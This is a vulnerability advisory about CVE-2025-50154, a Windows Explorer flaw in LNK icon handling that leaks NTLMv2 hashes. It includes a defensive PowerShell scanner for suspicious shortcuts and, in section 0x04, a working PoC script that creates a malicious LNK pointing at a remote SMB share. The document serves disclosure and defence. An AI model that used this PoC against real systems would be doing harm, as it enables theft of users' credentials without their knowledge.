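0x00 Introduction
Windows File Explorer is the core file management tool of the Windows operating system, used to browse and organize files and folders. It presents local disks and network resources in a tree view and supports operations such as copy, move and delete. Its interface includes a navigation pane, an address bar and a ribbon menu for quick access and preview.
0x01 Vulnerability Description
The vulnerability concerns how Windows Explorer handles LNK shortcut files. Specifically:
1. The root cause is a flaw in how Explorer parses the icon of an LNK file
2. Microsoft previously fixed the security issue of loading icons through a UNC path (CVE-2025-24054)
3. That fix missed another attack path: the vulnerability is still triggered when an LNK file meets both of the following conditions:
(1) The icon path points to a local system file (such as shell32.dll).
(2) The executable path points to a program file on a remote SMB share.
4. In this case, Explorer automatically downloads the remote file to extract its embedded icon resource
5. This process initiates NTLM authentication without the user being aware of it, which leaks the NTLMv2-SSP hash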
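The two conditions in item 3 can be checked from the defender's side. The PowerShell below is an added example, not code from the original post or the PoC repository: it parses .lnk bytes directly (header, LinkFlags, StringData) to read the icon location and uses a heuristic string search for a UNC path. The function names, the sample bytes and the 192.0.2.10 address are constructed for illustration.

```powershell
# Added example: flag .lnk files with a local icon path and a UNC path inside the file.
# Reads raw bytes only; the shell is never asked to load the shortcut being inspected.
function Read-LnkString([byte[]]$Bytes, [ref]$Pos, [bool]$Unicode) {
    # StringData item: 2-byte character count, then the characters (no terminator)
    $count = [BitConverter]::ToUInt16($Bytes, $Pos.Value)
    $size  = if ($Unicode) { $count * 2 } else { $count }
    $enc   = if ($Unicode) { [Text.Encoding]::Unicode } else { [Text.Encoding]::ASCII }
    $text  = $enc.GetString($Bytes, $Pos.Value + 2, $size)
    $Pos.Value += 2 + $size
    $text
}
function Test-LnkBytes([byte[]]$Bytes) {
    # ShellLinkHeader is 0x4C bytes; LinkFlags is the DWORD at offset 0x14
    if ($Bytes.Length -lt 0x4C -or [BitConverter]::ToUInt32($Bytes, 0) -ne 0x4C) { return }
    $flags = [BitConverter]::ToUInt32($Bytes, 0x14)
    $pos = 0x4C
    if ($flags -band 0x01) { $pos += 2 + [BitConverter]::ToUInt16($Bytes, $pos) }   # LinkTargetIDList
    if ($flags -band 0x02) { $pos += [int][BitConverter]::ToUInt32($Bytes, $pos) }  # LinkInfo
    $icon = $null
    # StringData order: NAME, RELATIVE_PATH, WORKING_DIR, ARGUMENTS, ICON_LOCATION
    foreach ($bit in 0x04, 0x08, 0x10, 0x20, 0x40) {
        if ($flags -band $bit) {
            $s = Read-LnkString $Bytes ([ref]$pos) ([bool]($flags -band 0x80))
            if ($bit -eq 0x40) { $icon = $s }
        }
    }
    # Heuristic: drop NULs so ASCII and UTF-16LE text both match, then look for \\host\share
    $flat = [Text.Encoding]::GetEncoding(28591).GetString($Bytes).Replace([string][char]0, '')
    $unc  = [regex]::Match($flat, '\\\\[A-Za-z0-9._-]+\\[A-Za-z0-9._$ -]+').Value
    if ($icon -and $unc -and ($icon -match '^(?:[A-Za-z]:\\|%)')) {
        [pscustomobject]@{ IconLocation = $icon; UncTarget = $unc }
    }
}
function Find-RemoteTargetLnk([string]$Root) {
    Get-ChildItem -LiteralPath $Root -Recurse -Filter *.lnk -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $f = $_.FullName
            try {
                $hit = Test-LnkBytes ([IO.File]::ReadAllBytes($f))
                if ($hit) { $hit | Add-Member NoteProperty Path $f -PassThru }
            } catch { Write-Warning "Unparseable LNK: $f" }
        }
}
# Constructed sample: header + ICON_LOCATION + a UTF-16 UNC string; not a working shortcut
$hdr = [byte[]]::new(0x4C); $hdr[0] = 0x4C; $hdr[0x14] = 0xC0   # HasIconLocation | IsUnicode
$ico = 'C:\Windows\System32\SHELL32.dll'
$sample = $hdr + [BitConverter]::GetBytes([uint16]$ico.Length) +
          [Text.Encoding]::Unicode.GetBytes($ico + '\\192.0.2.10\share\app.exe')
Test-LnkBytes $sample
```

Run Find-RemoteTargetLnk against download, desktop and shared folders; legitimate shortcuts to internal file shares also match, so compare each UncTarget host against known file servers before treating a hit as suspicious.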
0x02 CVE ID
CVE-2025-50154
0x03 Affected Versions
Windows 10 Version 21H2 for 32-bit Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows Server 2025
Windows 11 Version 24H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows Server 2025 (Server Core installation)
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
0x04 Vulnerability Details
POC:
https://github.com/rubenformation/CVE-2025-50154
<#
.SYNOPSIS
Creates a malicious LNK file that triggers SMB NTLMv2-SSP hash disclosure.
This code is for educational and research purposes only.
The author takes no responsibility for any misuse of this code.
.DESCRIPTION
This script generates a .LNK shortcut pointing to a remote SMB-hosted binary file.
The shortcut uses a default Windows icon (SHELL32.dll) but still forces Explorer to
fetch the PE icon from the remote binary, triggering authentication.
.PARAMETER path
Local path where the LNK file will be saved (e.g., C:\Users\User\Desktop).
.PARAMETER ip
IP address or hostname of the remote SMB server hosting the binary.
.PARAMETER share
The shared folder on the SMB server where the binary is stored.
.PARAMETER file
The name of the binary file (e.g., payload.exe).
.EXAMPLE
.\poc.ps1 -path "C:\Temp" -ip "192.168.1.10" -share "malware" -file "payload.exe"
#>
param(
    [Parameter(Mandatory=$true)]
    [string]$path,   # -path
    [Parameter(Mandatory=$true)]
    [string]$ip,     # -ip
    [Parameter(Mandatory=$true)]
    [string]$share,  # -share
    [Parameter(Mandatory=$true)]
    [string]$file    # -file
)
# Build file paths
$shortcutPath = Join-Path $path "poc.lnk"
$targetPath = "\\$ip\$share\$file"
$iconLocation = "C:\Windows\System32\SHELL32.dll"
# Create LNK file
$wShell = New-Object -ComObject WScript.Shell
$shortcut = $wShell.CreateShortcut($shortcutPath)
$shortcut.TargetPath = $targetPath
$shortcut.IconLocation = $iconLocation
$shortcut.Save()
Write-Output "Shortcut created at: $shortcutPath"
Write-Output "Target path: $targetPath"
0x05 Reference Links
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50154/